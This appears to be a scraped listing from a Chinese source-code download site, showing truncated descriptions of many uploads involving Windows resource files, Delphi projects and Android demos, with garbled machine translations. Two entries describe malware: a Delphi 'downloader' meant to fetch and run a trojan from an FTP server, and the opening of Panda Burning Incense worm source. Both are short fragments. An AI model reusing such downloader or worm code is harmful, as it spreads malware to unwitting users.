搜索资源列表
i81x DDraw Display Driver
- Intel(R) i810/i815 Display Driver with DirectX Release for Microsoft Windows* CE 3.00 and Microsoft Windows* CE.Net. This driver requires either the 3.00 or the .NET release of Microsoft Windows* CE in order for it to work.-Intel (R) DIMM
Windows串口编程例子
- in the RES subdirectory. This file can be directly edited in Microsoft Visual C++. ver10.clw This file contains information used by ClassWizard to edit existing classes or add new classes. ClassWizard also uses this file to store in
xiao_qu_bao_biao
- program kehuji uses Forms, Unit1 in ..\\zxc\\Unit1.pas {Form1}, Unit2 in ..\\zxc\\Unit2.pas {Form2}, Unit3 in ..\\zxc\\Unit3.pas {Form3}, Unit4 in ..\\zxc\\Unit4.pas {Form4} // Unit3 in C:\\Program Files\\Borland\\Delphi7\\
mydown
- 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadF
FileMapping
- program FileMapping uses Forms, formMain in formMain.pas {frmMain} {$R *.res} begin Application.Initialize Application.CreateForm(TfrmMain, frmMain) Application.Run end.
hyplas
- ************************************************************************ * * * * * THIS IS THE H Y P L A S 2.0 README FILE * * ----------------- * * * * HYPLAS is a finite element program for implicit small and large * * strain analisys of hyperelast
mtk-res-editV29
- mtk直接读取和修改ROM文件,能修改和导出导入bin中的图片和铃声-MTK ROM directly read and modify files, modify and export to import bin of pictures and ring tones
r
- 实现图象的平滑(去噪声),锐化 命令行编译过程如下 vcvars32 rc bmp.rc cl compress.c bmp.res user32.lib gdi32.lib-The Method of Preserving Edge Smoothing
shabiying
- RGB是色光的色彩模式。R代表红色,G代表绿色,B代表蓝色,三种色彩叠加形成了其它的色彩。因为三种颜色都有256个亮度水平级,所以三种色彩叠加就形成1670万种颜色了。也就是真彩色,通过它们足以在现绚丽的世界。- This is a listing of all of the Microsoft Windows resources that the program uses. It includes the icons, bitmaps, and cursors that are
res
- 作为设计者,应应当了解经常用到的电阻值。-res
vb_res
- 介绍VB中添加使用RES资源文件的方法,可以实现绿色软件编程。-Introduction VB RES resource file to add the method to use, you can achieve green software programming.
DLL-Ver-Info
- 1.请根据ver.rc里面的内容修改为您要的. 2.运行ver.bat后,会生成ver.RES 3.在工程文件代码中加入 {$R ver.res} 编译出来的DLL文件即有版本等相关信息.-1. Please ver.rc modify the contents of which you want. 2. Ver.bat run, it will generate ver.RES 3. In the project file to add the code {$ R
bELAJAR
- program Project1 uses Forms, Unit1 in Unit1.pas {Form1}, Unit2 in Unit2.pas {Form2} {$R *.res} begin Application.Initialize Application.Title := MENGHITUNG VOLUME BANGUN RUANG Application.CreateForm(TForm1, Form1)
Android-VieW-Canvas-bitmap
- BitMap、View以及Canvas是我们Ophone程序中常用到的类。本日以feisky的学习笔记呈现,通过实例讲解View&Canvas等等。 1. 从资源中获取位图 可以使用BitmapDrawable或者BitmapFactory来获取资源中的位图。 当然,首先需要获取资源: Resources res=getResources() 使用BitmapDrawable获取位图 使用BitmapDrawable (InputStrea
SharifPWE_BZplot
- The ouput is the TE/TM band structure (first five bands) along pricipal directions (G-X-M-G) of a square-lattice photonic crystal with unit cell consisting of a substrate of "epb" relative permittivity with circular rods(holes) of "epa" rel
Android_helloworld
- 实验功能: 在第一个Hello World!为标签的activity中显示good,该界面中有一个名为Next的按钮。点击Next按钮进入到第二个activity中去,第二个界面中只有1个Close按钮。当然,据网上有人将要比较安全的实现关闭程序的功能也不是挺简单的,因为android有专门的退出键返回键等。所以该Close按钮暂时没去实现它。 我的第1个activity为HelloworldActivity,第2个activity为NextActivity. 实验说明:
virus
- 熊猫烧香原代码 熊猫烧香, 十六进制, Windows, 源代码, 字符串 熊猫烧香源代码 program Japussy uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry} const HeaderSize = 82432 //病毒体的大小 IconOffset = EB8 //PE文件主图标的偏移量 //在我的Delphi5 SP1
RSA001
- program RPGViewer (*$WARNINGS OFF*) (*$HINTS OFF*) uses Forms, UnitExample in UnitExample.pas {FormAES}, AES in AES.pas , ElAES in ElAES.pas {$R *.res} begin Application.Initialize Application.MainFormOnTask
uac
- 用法: {$R *.dfm} {$R uac.res} 2个功能: 1、程序关闭时不再弹出无用的兼容性助手 2、使程序可弹出uac授权申请-Usage: {$ R* .dfm} {$ R uac.res} 2 functions: 1, when the program is closed no longer eject unwanted Compatibility Assistant 2, so that the program can be authorized t
RequestAdmin
- best and simple way to get Adminstrator Privilege is to use this .res file just you must set Runtime Themes to None Project Option and add {$R RequestAdmin.RES} under implementation section dont forget: copy RequestAdmin.RES in .dpr folder(p